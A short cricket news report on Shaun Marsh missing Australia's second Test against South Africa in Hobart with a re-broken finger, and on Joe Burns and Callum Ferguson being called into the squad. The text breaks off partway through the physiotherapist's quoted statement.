Aussies add two players to second Test squad, as Marsh ruled out through injury

Australian opener Shaun Marsh will miss the second Test against South Africa in Hobart through injury.

Marsh broke his finger during the Test series against Sri Lanka in August, but opted not have surgery, and was rested from the recent ODI series against the Proteas to allow it to recover.

However, he broke the same finger again during Australia's opening Test loss to South Africa at the WACA and could miss the rest of the series.

As a result, Joe Burns and Callum Ferguson have been added to Australia's squad for the second Test.

"Shaun re-injured his left little finger on day one while fielding," Australian team Physiotherapist David Beakley said.

"Subsequent x-rays have shown a similar break to the previous one and he will now require surgery to stabilise the bone fragment.
